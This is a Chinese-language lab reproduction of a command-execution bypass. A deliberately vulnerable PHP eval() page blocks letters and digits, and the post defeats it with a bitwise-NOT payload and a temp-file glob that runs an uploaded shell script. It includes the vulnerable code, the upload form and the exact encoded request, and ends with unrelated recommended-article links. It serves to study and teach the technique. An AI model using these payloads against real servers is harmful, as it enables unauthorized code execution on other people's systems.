无字母数字通过命令执行上传webshell复现

目录
ubuntu配置代码

复现过程:
1.首先访问1.php,会直接显示代码
2.尝试赋予code参数值为1,显示为NO.
3.方法其一,通过PHP7.x特性达成效果
4.接下来要使用burpsuite,所以先打开服务器代理
5.抓取1.php的get请求包
[6.右键选择send to reapeater](#6.右键选择send to reapeater)
7.再选择文件1.txt提交,然后抓post上传文件的格式
8.抓到post传文件包也发送到repeater模块
9.将post内的红框部分复制并粘贴到1.php的get包内
10.注意左上角的get改成POST,最下方的1.txt当时漏了写#!/bin/bash
11.再次填写php表达式发现phpinfo()依旧成功,证明发送包有效
[12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符](#12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符)
13.shell下可以用.执行任意脚本
14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件
15.可以使用CyberChef工具来快速进行url编码
16.临时文件最后一个祖父随机生成大小写还有数字,如图一次大写没有产生
17.如图,最后成功执行了id指令,webshell上传成功

ubuntu配置代码:

首先ubuntu开启nginx服务并vim创建1.php和demo.html2个文件

bash 复制代码
cd /usr/local/nginx/sbin
./nginx 
cd /usr/local/nginx/html
vim 1.php
	<?php
	//sleep(15); #有sleep()情况下执行该php文件可以在/tmp目录下看见产生的临时文件
	if(isset($_GET['code'])){
	    $code = $_GET['code'];
	    if(strlen($code)>35){
 	       die("Long.");
 	   }
	    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
	        die("NO.");
	    }
	    eval($code);
	}else{
	    highlight_file(__FILE__);
	}
vim demo.html
	<!DOCTYPE html>
	<html lang="en">
	<head>
	        <meta charset="UTF-8">
		        <meta name="viewport" content="width=device-width, initial-scale=1.0">
	        <title>Document</title>
	</head>
	<body>
	        <form action="1.php" method="post" enctype="multipart/form-data">
	                <input type="file" name="file" id="">
	                <input type="submit" value="submit">
	        </form>
	</body>
	</html>

1.首先访问1.php,会直接显示代码

2.尝试赋予code参数值为1,显示为NO.

3.方法其一,通过PHP7.x特性达成效果

因为用的php版本为7.x,支持($a)();执行动态函数,所以可以用('phpinfo')();的形式来执行phpinfo()函数,因此只需要构造一个可以生成phpinfo这一串字符串的PHP表达式皆可,payload:(~%8F%97%8F%96%91%99%90)();

4.接下来要使用burpsuite,所以先打开服务器代理

5.抓取1.php的get请求包


6.右键选择send to reapeater

7.再选择文件1.txt提交,然后抓post上传文件的格式

bash 复制代码
#!/bin/bash 
#1.txt内有内容
id


8.抓到post传文件包也发送到repeater模块

9.将post内的红框部分复制并粘贴到1.php的get包内

bash 复制代码
其中一下字段可以删了:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip. deflate, br
Accept-language: zh-CN, zh;q=0.9, en;q=0.8,en-GB;q=0. 7, en-Us;q=0.6
x_ forvarded_ for: 127.0.0.1


10.注意左上角的get改成POST,最下方的1.txt当时漏了写#!/bin/bash

11.再次填写php表达式发现phpinfo()依旧成功,证明发送包有效

12.cd /tmp目录下然后ls -al查看临时文件,发现临时文件占9个字符

且有概率最后一个字符为大写字母,而大写字母在ascii码中位于@和[之间,其他位的字符可以用?来匹配,同时linux系统初始基本上不会产生以大写字母结尾的文件的,所以大写字母可以用[@-[]来匹配。而该临时文件又在tmp文件夹下,所以匹配字段可以是/???/???[@-[]


13.shell下可以用.执行任意脚本

所以可以用. /???/???[@-[]指令来执行临时文件,但是eval()函数作为执行函数只能执行php代码不能执行linux命令,所以要加上``,同时将?、;、@分别unicode编码成%3F、%3B、%40,用+代替空格

如下图:POST /1.php?code=?><?=\`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[%40-[]\`%3b?> HTTP/1.1

14.在1.php最上方加入sleep()函数即可在/tmp文件夹下查看临时文件

15.可以使用CyberChef工具来快速进行url编码

16.临时文件最后一个祖父随机生成大小写还有数字,如图一次大写没有产生

17.如图,最后成功执行了id指令,webshell上传成功

感受:感觉非洲人还是不适合做这个,我随机生成临时文件半天,全是小写字母或者数字,搞得我以为前面做错了,还得排错,愣是卡了20多分钟,最后还是靠着sleep函数,send+cancel不断生成临时文件,最后发现有大写才搞定。

相关推荐
aloha_7891 小时前
从零记录搭建一个干净的mybatis环境
java·笔记·spring·spring cloud·maven·mybatis·springboot
音徽编程2 小时前
Rust异步运行时框架tokio保姆级教程
开发语言·网络·rust
dsywws2 小时前
Linux学习笔记之vim入门
linux·笔记·学习
幺零九零零3 小时前
【C++】socket套接字编程
linux·服务器·网络·c++
23zhgjx-NanKon4 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon4 小时前
华为eNSP:mux-vlan
网络·安全·华为
点点滴滴的记录4 小时前
RPC核心实现原理
网络·网络协议·rpc
A-超5 小时前
vue3展示pag格式动态图
笔记
Lionhacker5 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
程思扬5 小时前
为什么Uptime+Kuma本地部署与远程使用是网站监控新选择?
linux·服务器·网络·经验分享·后端·网络协议·1024程序员节